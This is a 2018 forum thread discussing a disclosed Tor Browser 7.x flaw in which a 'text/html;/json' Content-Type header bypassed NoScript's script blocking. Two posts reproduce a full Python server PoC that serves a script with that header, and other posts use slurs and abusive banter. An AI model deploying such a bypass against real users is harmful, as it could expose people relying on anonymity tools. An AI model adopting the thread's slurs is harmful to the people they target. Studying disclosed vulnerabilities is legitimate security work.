User Controls

Navigation

Niggas in Space > Technophiliacs & Technophiles > Old Tor Browser Zero Day Released
  1. 1
  2. 2

Old Tor Browser Zero Day Released

  1. 2018-09-11 at 11:23 AM UTC
    #1
    Soyboy 2.0 - The GMO Reckoning African Astronaut
    Advisory: Tor Browser 7.x has a serious vuln/bugdoor leading to full bypass of Tor / NoScript 'Safest' security level (supposed to block all JS).
    PoC: Set the Content-Type of your html/js page to "text/html;/json" and enjoy full JS pwnage. Newly released Tor 8.x is Not affected.
    https://twitter.com/Zerodium/status/1039127214602641409?s=19

    Apparently being released as it doesn't affect Tor Browser 8, and Zerodium can't sell it to their customers (mostly governments) any more.
  2. 2018-09-11 at 11:26 AM UTC
    #2
    Sophie Pedophile Tech Support
    Joke's on you 0day, i always run the latest Tor.
  3. 2018-09-11 at 11:29 AM UTC
    #3
    Soyboy 2.0 - The GMO Reckoning African Astronaut
    Originally posted by Sophie Joke's on you 0day, i always run the latest Tor.

    I should have said "made public". Zerodium have been selling this exploit to anyone who will pay for 6 months or so.
  4. 2018-09-11 at 12:11 PM UTC
    #4
    Sophie Pedophile Tech Support
    Originally posted by MORALLY SUPERIOR BEING 2.0 - The GMO Reckoning I should have said "made public". Zerodium have been selling this exploit to anyone who will pay for 6 months or so.

    Eh, haven't been anywhere risqué lately. So YOLO.
  5. 2018-09-11 at 12:29 PM UTC
    #5
    Sudo Black Hole [my hereto riemannian peach]
    Who wouldn't want to buy a tor 0day? That would be kind of amazing and profitable.
  6. 2018-09-11 at 12:32 PM UTC
    #6
    Sophie Pedophile Tech Support
    Originally posted by Sudo Who wouldn't want to buy a tor 0day? That would be kind of amazing and profitable.

    That's why Zerodium's entire business model is acquiring 0days, and selling them on.
  7. 2018-09-11 at 12:44 PM UTC
    #7
    Sudo Black Hole [my hereto riemannian peach]
    Originally posted by Sophie That's why Zerodium's entire business model is acquiring 0days, and selling them on.

    Yeah I'd never heard of them before but that sounds highly profitable. I bet they have a team of methed out slavs listening to techno 24/7
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. 2018-09-11 at 4:27 PM UTC
    #8
    aldra JIDF Controlled Opposition
    Originally posted by Sophie Joke's on you 0day, i always run the latest Tor.

    just install tor properly and don't use the faggot bundles

    all the major 'tor' flaws released have actually been issues with the included browser
  9. 2018-09-11 at 9:40 PM UTC
    #9
    -SpectraL coward [the spuriously bluish-lilac bushman] 
    #!/usr/bin/python
    from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

    PORT_NUMBER = 31337

    class myHandler(BaseHTTPRequestHandler):

            #Handler for the GET requests
            def do_GET(self):
                    self.send_response(200)
                    self.send_header('Content-type','text/html;/json') # Here is where the magic happens
                    self.end_headers()
                    self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
                    return

    try:
            server = HTTPServer(('', PORT_NUMBER), myHandler)
            print 'Started httpserver on port ' , PORT_NUMBER
            server.serve_forever()

    except KeyboardInterrupt:
            print '^C received, shutting down the web server'
            server.socket.close()
  10. 2018-09-11 at 9:42 PM UTC
    #10
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL 
    #!/usr/bin/python
    from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

    PORT_NUMBER = 31337

    class myHandler(BaseHTTPRequestHandler):

            #Handler for the GET requests
            def do_GET(self):
                    self.send_response(200)
                    self.send_header('Content-type','text/html;/json') # Here is where the magic happens
                    self.end_headers()
                    self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
                    return

    try:
            server = HTTPServer(('', PORT_NUMBER), myHandler)
            print 'Started httpserver on port ' , PORT_NUMBER
            server.serve_forever()

    except KeyboardInterrupt:
            print '^C received, shutting down the web server'
            server.socket.close()

    Gonna go out on a limb here and say you stole that PoC from X0rz, without checking. What do i get if i am right?
  11. 2018-09-11 at 9:51 PM UTC
    #11
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Originally posted by Sophie Gonna go out on a limb here and say you stole that PoC from X0rz, without checking. What do i get if i am right?

    You get a caramel-coated, peppermint fudge twizzle stick.
  12. 2018-09-11 at 10:08 PM UTC
    #12
    Sophie Pedophile Tech Support
    https://gist.github.com/x0rz/8198e8e22b1f70fddb9c815c1232b795

    Where's my twizzle stick.
  13. 2018-09-11 at 10:38 PM UTC
    #13
    -SpectraL coward [the spuriously bluish-lilac bushman]
    Originally posted by Sophie https://gist.github.com/x0rz/8198e8e22b1f70fddb9c815c1232b795

    Where's my twizzle stick.

    No, that's not where I got it.
  14. 2018-09-11 at 11:36 PM UTC
    #14
    Sophie Pedophile Tech Support
    Originally posted by -SpectraL No, that's not where I got it.


    The code is literally the same, if you got it from some place else that person stole it from x0rz first, i know this. x0rz was posting about this very issue earlier today you mong.
  15. 2018-09-11 at 11:57 PM UTC
    #15
    Lanny Bird of Courage
    Only have to ask spectral on question in vulnerability disclosure threads: explain the attack in your own words.

    - From there you just have to sit back and enjoy the ducking and diving he'll go through in order to pretend like he understands.
  16. 2018-09-12 at 12:01 AM UTC
    #16
    HTS highlight reel
    Originally posted by Lanny
    Only have to ask spectral on question in vulnerability disclosure threads: explain the attack in your own words.

    - From there you just have to sit back and enjoy the ducking and diving he'll go through in order to pretend like he understands.

    The base HTTP request handler is requesting js from pages, bypassing NoScript.

    (I have no idea what I'm talking about.)
  17. 2018-09-12 at 12:01 AM UTC
    #17
    HTS highlight reel
    Can I get a gold star for trying?
  18. 2018-09-12 at 12:05 AM UTC
    #18
    Sophie Pedophile Tech Support
    Read the comments in the code you'll figure it out.
  19. 2018-09-12 at 12:07 AM UTC
    #19
    Lanny Bird of Courage
    The following users say it would be alright if the author of this post didn't die in a fire!
  20. 2018-09-12 at 12:11 AM UTC
    #20
    aldra JIDF Controlled Opposition
    Originally posted by HTS The base HTTP request handler is requesting js from pages, bypassing NoScript.

    (I have no idea what I'm talking about.)

    normally when a page sends the header, it tells your browser what sort of content is to be loaded. the tor-configured browser by default will block javascript even if it's requested, but for whatever reason if you request JSON (which relies on javascript) with that semicolon in there (probably causes the enhancement to think the header is finished so it doesn't search any further) it spazzes out and loads it anyway
    The following users say it would be alright if the author of this post didn't die in a fire!
  1. 1
  2. 2
Jump to Top